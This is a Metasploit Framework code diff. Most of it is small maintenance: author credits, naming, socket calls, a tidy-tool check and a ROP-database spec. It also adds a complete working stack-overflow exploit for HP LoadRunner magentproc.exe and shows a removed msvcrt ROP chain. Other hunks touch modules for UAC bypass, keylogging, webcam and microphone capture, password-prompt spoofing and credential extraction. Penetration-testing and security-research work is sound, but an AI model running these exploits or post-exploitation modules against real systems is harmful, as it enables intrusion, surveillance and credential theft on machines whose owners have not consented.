@ -195,7 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote
q_id = Rex::Text.rand_text_alpha(1) q_id = Rex::Text.rand_text_alpha(1)
html = %Q| %Q|
<!DOCTYPE html> <!DOCTYPE html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time"> <HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<head> <head>
@ -244,8 +185,6 @@ class Metasploit3 < Msf::Exploit::Remote
<t:ANIMATECOLOR id="myanim"/> <t:ANIMATECOLOR id="myanim"/>
</html> </html>
| |
html
end end
def on_request_uri(cli, request) def on_request_uri(cli, request)
@ -253,7 +192,7 @@ class Metasploit3 < Msf::Exploit::Remote
t = get_target(agent) t = get_target(agent)
if t if t
p = get_payload(t, cli) p = get_payload(t)
html = get_html(t, p) html = get_html(t, p)
print_status("Sending exploit...") print_status("Sending exploit...")
send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'}) send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})

32
modules/exploits/windows/browser/ms13_069_caret.rb
View File

@ -11,6 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
@ -106,32 +107,6 @@ class Metasploit3 < Msf::Exploit::Remote
def get_payload(t) def get_payload(t)
rop =
[
0x77c1e844, # POP EBP # RETN [msvcrt.dll]
0x77c1e844, # skip 4 bytes [msvcrt.dll]
0x77c4fa1c, # POP EBX # RETN [msvcrt.dll]
0xffffffff,
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c127e5, # INC EBX # RETN [msvcrt.dll]
0x77c4e0da, # POP EAX # RETN [msvcrt.dll]
0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll]
0x77c34fcd, # POP EAX # RETN [msvcrt.dll]
0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx)
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll]
0x77c3048a, # POP EDI # RETN [msvcrt.dll]
0x77c47a42, # RETN (ROP NOP) [msvcrt.dll]
0x77c46efb, # POP ESI # RETN [msvcrt.dll]
0x77c2aacc, # JMP [EAX] [msvcrt.dll]
0x77c3b860, # POP EAX # RETN [msvcrt.dll]
0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll]
0x77c12df9, # PUSHAD # RETN [msvcrt.dll]
0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll]
].pack("V*")
# This data should appear at the beginning of the target address (see TargetAddr in metadata) # This data should appear at the beginning of the target address (see TargetAddr in metadata)
p = '' p = ''
p << rand_text_alpha(225) # Padding to avoid null byte addr p << rand_text_alpha(225) # Padding to avoid null byte addr
@ -139,10 +114,9 @@ class Metasploit3 < Msf::Exploit::Remote
p << [t['Align']].pack("V*") * ( (0x2c-4)/4 ) # 0x2c bytes to pivot (-4 for TargetAddr) p << [t['Align']].pack("V*") * ( (0x2c-4)/4 ) # 0x2c bytes to pivot (-4 for TargetAddr)
p << [t['Pivot']].pack("V*") # Stack pivot p << [t['Pivot']].pack("V*") # Stack pivot
p << rand_text_alpha(4) # Padding for the add esp,0x2c alignment p << rand_text_alpha(4) # Padding for the add esp,0x2c alignment
p << rop # ROP chain p << generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'})
p << payload.encoded # Actual payload
return p p
end end

6
modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb
View File

@ -26,9 +26,9 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
'Name' => "SIEMENS Solid Edge ST4 SEListCtrlX ActiveX Remote Code Execution", 'Name' => "Siemens Solid Edge ST4 SEListCtrlX ActiveX Remote Code Execution",
'Description' => %q{ 'Description' => %q{
This module exploits the SEListCtrlX ActiveX installed with the SIEMENS Solid Edge product. This module exploits the SEListCtrlX ActiveX installed with the Siemens Solid Edge product.
The vulnerability exists on several APIs provided by the control, where user supplied input The vulnerability exists on several APIs provided by the control, where user supplied input
is handled as a memory pointer without proper validation, allowing an attacker to read and is handled as a memory pointer without proper validation, allowing an attacker to read and
corrupt memory from the target process. This module abuses the methods NumChildren() and corrupt memory from the target process. This module abuses the methods NumChildren() and
@ -497,4 +497,4 @@ class Metasploit3 < Msf::Exploit::Remote
send_response(cli, html, {'Content-Type'=>'text/html'}) send_response(cli, html, {'Content-Type'=>'text/html'})
end end
end end

4
modules/exploits/windows/local/bypassuac.rb
View File

@ -81,9 +81,7 @@ class Metasploit3 < Msf::Exploit::Local
print_good "UAC is set to Default" print_good "UAC is set to Default"
print_good "BypassUAC can bypass this setting, continuing..." print_good "BypassUAC can bypass this setting, continuing..."
when 0 when 0
print_error "UAC is not enabled, no reason to run module" print_warning "Could not determine UAC level - attempting anyways..."
print_error "Run exploit/windows/local/ask to elevate"
return
end end
# Check if you are an admin # Check if you are an admin

83
modules/exploits/windows/misc/hp_loadrunner_magentproc.rb Normal file
View File

@ -0,0 +1,83 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'HP LoadRunner magentproc.exe Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in HP LoadRunner before 11.52. The
vulnerability exists on the LoadRunner Agent Process magentproc.exe. By sending
a specially crafted packet, an attacker may be able to execute arbitrary code.
},
'Author' =>
[
'Unknown', # Original discovery # From Tenable Network Security
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-4800'],
['OSVDB', '95644'],
['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-169/']
],
'Privileged' => false,
'DefaultOptions' =>
{
'SSL' => true,
'SSLVersion' => 'SSL3',
'PrependMigrate' => true
},
'Payload' =>
{
'Space' => 4096,
'DisableNops' => true,
'BadChars' => "\x00",
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
},
'Platform' => 'win',
'DefaultTarget' => 0,
'Targets' =>
[
[
'Windows XP SP3 / HP LoadRunner 11.50',
{
# magentproc.exe 11.50.2042.0
'Offset' => 1104,
'Ret' => 0x7ffc070e, # ppr # from NLS tables # Tested stable over Windows XP SP3 updates
'Crash' => 6000 # Length needed to ensure an exception
}
]
],
'DisclosureDate' => 'Jul 27 2013'))
register_options([Opt::RPORT(443)], self.class)
end
def exploit
req = [0xffffffff].pack("N") # Fake Length
req << rand_text(target['Offset'])
req << generate_seh_record(target.ret)
req << payload.encoded
req << rand_text(target['Crash'])
connect
print_status("Sending malicious request...")
sock.put(req)
disconnect
end
end

4
modules/exploits/windows/misc/hp_operations_agent_coda_34.rb
View File

@ -126,7 +126,7 @@ user-agent: BBC 11.00.044; coda unknown version
connect connect
sock.put(ping_request) sock.put(ping_request)
res = sock.get_once(-1, 1) res = sock.get_once
disconnect disconnect
return res return res
@ -162,7 +162,7 @@ user-agent: BBC 11.00.044; 14
print_status("#{peer} - Sending HTTP Expect...") print_status("#{peer} - Sending HTTP Expect...")
sock.put(http_headers) sock.put(http_headers)
res = sock.get_once(-1, 1) res = sock.get_once
if not res or res !~ /HTTP\/1\.1 100 Continue/ if not res or res !~ /HTTP\/1\.1 100 Continue/
print_error("#{peer} - Failed while sending HTTP Expect Header") print_error("#{peer} - Failed while sending HTTP Expect Header")
return return

4
modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb
View File

@ -126,7 +126,7 @@ user-agent: BBC 11.00.044; coda unknown version
connect connect
sock.put(ping_request) sock.put(ping_request)
res = sock.get_once(-1, 1) res = sock.get_once
disconnect disconnect
return res return res
@ -162,7 +162,7 @@ user-agent: BBC 11.00.044; 14
print_status("#{peer} - Sending HTTP Expect...") print_status("#{peer} - Sending HTTP Expect...")
sock.put(http_headers) sock.put(http_headers)
res = sock.get_once(-1, 1) res = sock.get_once
if not res or res !~ /HTTP\/1\.1 100 Continue/ if not res or res !~ /HTTP\/1\.1 100 Continue/
print_error("#{peer} - Failed while sending HTTP Expect Header") print_error("#{peer} - Failed while sending HTTP Expect Header")
return return

2
modules/payloads/singles/osx/x64/exec.rb
View File

@ -17,7 +17,7 @@ module Metasploit3
'Name' => 'OS X x64 Execute Command', 'Name' => 'OS X x64 Execute Command',
'Description' => 'Execute an arbitrary command', 'Description' => 'Execute an arbitrary command',
'Author' => [ 'argp <argp[at]census-labs.com>', 'Author' => [ 'argp <argp[at]census-labs.com>',
'joev <jvennix[at]rapid7.com>' ], 'joev' ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Platform' => 'osx', 'Platform' => 'osx',
'Arch' => ARCH_X86_64 'Arch' => ARCH_X86_64

2
modules/payloads/singles/osx/x86/exec.rb
View File

@ -30,7 +30,7 @@ module Metasploit3
[ [
'snagg <snagg[at]openssl.it>', 'snagg <snagg[at]openssl.it>',
'argp <argp[at]census-labs.com>', 'argp <argp[at]census-labs.com>',
'joev <jvennix[at]rapid7.com>' 'joev'
], ],
'License' => BSD_LICENSE, 'License' => BSD_LICENSE,
'Platform' => 'osx', 'Platform' => 'osx',

2
modules/post/multi/escalate/cups_root_file_read.rb
View File

@ -41,7 +41,7 @@ class Metasploit3 < Msf::Post
'Author' => 'Author' =>
[ [
"Jann Horn", # discovery "Jann Horn", # discovery
"joev <jvennix[at]rapid7.com>" # metasploit module "joev" # metasploit module
], ],
'DisclosureDate' => 'Nov 20 2012', 'DisclosureDate' => 'Nov 20 2012',
'Platform' => %w{ linux osx } 'Platform' => %w{ linux osx }

2
modules/post/osx/capture/keylog_recorder.rb
View File

@ -38,7 +38,7 @@ class Metasploit3 < Msf::Post
command using -e, so the payload never hits the disk. command using -e, so the payload never hits the disk.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => [ 'joev <jvennix[at]rapid7.com>'], 'Author' => [ 'joev'],
'Platform' => [ 'osx'], 'Platform' => [ 'osx'],
'SessionTypes' => [ 'shell', 'meterpreter' ] 'SessionTypes' => [ 'shell', 'meterpreter' ]
)) ))

2
modules/post/osx/gather/password_prompt_spoof.rb
View File

@ -21,7 +21,7 @@ class Metasploit3 < Msf::Post
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => [ 'Author' => [
'Joff Thyer <jsthyer[at]gmail.com>', # original post module 'Joff Thyer <jsthyer[at]gmail.com>', # original post module
'joev <jvennix[at]rapid7.com>' # bug fixes 'joev' # bug fixes
], ],
'Platform' => [ 'osx' ], 'Platform' => [ 'osx' ],
'References' => [ 'References' => [

2
modules/post/osx/manage/record_mic.rb
View File

@ -23,7 +23,7 @@ class Metasploit3 < Msf::Post
capture (with the RECORD action) audio inputs on a remote OSX machine. capture (with the RECORD action) audio inputs on a remote OSX machine.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => [ 'joev <jvennix[at]rapid7.com>'], 'Author' => [ 'joev'],
'Platform' => [ 'osx'], 'Platform' => [ 'osx'],
'SessionTypes' => [ 'shell', 'meterpreter' ], 'SessionTypes' => [ 'shell', 'meterpreter' ],
'Actions' => [ 'Actions' => [

2
modules/post/osx/manage/webcam.rb
View File

@ -24,7 +24,7 @@ class Metasploit3 < Msf::Post
record a webcam and mic (with the RECORD action) record a webcam and mic (with the RECORD action)
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => [ 'joev <jvennix[at]rapid7.com>'], 'Author' => [ 'joev'],
'Platform' => [ 'osx'], 'Platform' => [ 'osx'],
'SessionTypes' => [ 'shell', 'meterpreter' ], 'SessionTypes' => [ 'shell', 'meterpreter' ],
'Actions' => [ 'Actions' => [

4
modules/post/windows/gather/credentials/dyndns.rb
View File

@ -14,9 +14,9 @@ class Metasploit3 < Msf::Post
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
'Name' => 'Windows Gather Dyn-Dns Client Password Extractor', 'Name' => 'Windows Gather DynDNS Client Password Extractor',
'Description' => %q{ 'Description' => %q{
This module extracts the username, password, and hosts for Dyn-Dns version 4.1.8. This module extracts the username, password, and hosts for DynDNS version 4.1.8.
This is done by downloading the config.dyndns file from the victim machine, and then This is done by downloading the config.dyndns file from the victim machine, and then
automatically decode the password field. The original copy of the config file is also automatically decode the password field. The original copy of the config file is also
saved to disk. saved to disk.

2
modules/post/windows/manage/multi_meterpreter_inject.rb
View File

@ -92,7 +92,7 @@ class Metasploit3 < Msf::Post
print_good("Successfully injected Meterpreter in to process: #{target_pid}") print_good("Successfully injected Meterpreter in to process: #{target_pid}")
rescue::Exception => e rescue::Exception => e
print_error("Failed to Inject Payload to #{target_pid}!") print_error("Failed to Inject Payload to #{target_pid}!")
print_error(e) print_error(e.message)
end end
end end

2
scripts/meterpreter/vnc.rb
View File

@ -95,7 +95,7 @@ if (tunnel)
pay.datastore['LPORT'] = rport pay.datastore['LPORT'] = rport
pay.datastore['VNCPORT'] = vport pay.datastore['VNCPORT'] = vport
else else
print_status("Creating a VNC reverse tcp stager: LHOST=#{rhost} LPORT=#{rport})") print_status("Creating a VNC reverse tcp stager: LHOST=#{rhost} LPORT=#{rport}")
payload = "windows/vncinject/reverse_tcp" payload = "windows/vncinject/reverse_tcp"
pay = client.framework.payloads.create(payload) pay = client.framework.payloads.create(payload)

2
spec/lib/msf/util/exe_spec.rb
View File

@ -12,6 +12,8 @@ describe Msf::Util::EXE do
described_class described_class
end end
before { pending "Pending RM#8463, fix all these these tests up." }
$framework = Msf::Simple::Framework.create( $framework = Msf::Simple::Framework.create(
:module_types => [ Msf::MODULE_NOP ], :module_types => [ Msf::MODULE_NOP ],
'DisableDatabase' => true 'DisableDatabase' => true

91
spec/lib/rex/exploitation/ropdb_spec.rb Normal file
View File

@ -0,0 +1,91 @@
require 'rex/exploitation/ropdb'
describe Rex::Exploitation::RopDb do
context "Class methods" do
context ".initialize" do
it "should initialize with a path of the ROP database ready" do
ropdb = Rex::Exploitation::RopDb.new
ropdb.instance_variable_get(:@base_path).should =~ /data\/ropdb\/$/
end
end
context ".has_rop?" do
ropdb = Rex::Exploitation::RopDb.new
it "should find the msvcrt ROP database" do
ropdb.has_rop?("msvcrt").should eq(true)
end
it "should find the java ROP database" do
ropdb.has_rop?("java").should eq(true)
end
it "should find the hxds ROP database" do
ropdb.has_rop?("hxds").should eq(true)
end
it "should find the flash ROP database" do
ropdb.has_rop?("flash").should eq(true)
end
it "should return false when I supply an invalid database" do
ropdb.has_rop?("sinn3r").should eq(false)
end
end
context ".select_rop" do
ropdb = Rex::Exploitation::RopDb.new
it "should return msvcrt gadgets" do
gadgets = ropdb.select_rop('msvcrt')
gadgets.length.should > 0
end
it "should return msvcrt gadgets for windows server 2003" do
gadgets = ropdb.select_rop('msvcrt', {'target'=>'2003'})
gadgets.length.should > 0
end
it "should return msvcrt gadgets with a new base" do
gadgets1 = ropdb.select_rop('msvcrt')
gadgets2 = ropdb.select_rop('msvcrt', {'base'=>0x10000000})
gadgets2[0].should_not eq(gadgets1[0])
end
end
context ".generate_rop_payload" do
ropdb = Rex::Exploitation::RopDb.new
it "should generate my ROP payload" do
ropdb.generate_rop_payload('msvcrt', 'AAAA').should =~ /AAAA$/
end
it "should generate my ROP payload with my stack pivot" do
ropdb.generate_rop_payload('msvcrt', 'AAAA', {'pivot'=>'BBBB'}).should =~ /^BBBB/
end
end
context ".get_safe_size" do
ropdb = Rex::Exploitation::RopDb.new
it "should return 0xfffffed0 (value does not need to be modified to avoid null bytes)" do
ropdb.send(:get_safe_size, 304).should eq(0xfffffed0)
end
it "should return 0xfffffeff (value is modified to avoid null bytes)" do
ropdb.send(:get_safe_size, 256).should eq(0xfffffeff)
end
end
context ".get_unsafe_size" do
ropdb = Rex::Exploitation::RopDb.new
it "should return 0xfffffc00 (contains a null byte)" do
ropdb.send(:get_unsafe_size, 1024).should eq(0xfffffc00)
end
end
end
end

8
tools/msftidy.rb
View File

@ -361,12 +361,16 @@ class Msftidy
warn("Spaces at EOL", idx) warn("Spaces at EOL", idx)
end end
# Allow tabs or spaces as indent characters, but not both. # Check for mixed tab/spaces. Upgrade this to an error() soon.
# This should check for spaces only on October 8, 2013
if (ln.length > 1) and (ln =~ /^([\t ]*)/) and ($1.match(/\x20\x09|\x09\x20/)) if (ln.length > 1) and (ln =~ /^([\t ]*)/) and ($1.match(/\x20\x09|\x09\x20/))
warn("Space-Tab mixed indent: #{ln.inspect}", idx) warn("Space-Tab mixed indent: #{ln.inspect}", idx)
end end
# Check for tabs. Upgrade this to an error() soon.
if (ln.length > 1) and (ln =~ /^\x09/)
warn("Tabbed indent: #{ln.inspect}", idx)
end
if ln =~ /\r$/ if ln =~ /\r$/
warn("Carriage return EOL", idx) warn("Carriage return EOL", idx)
end end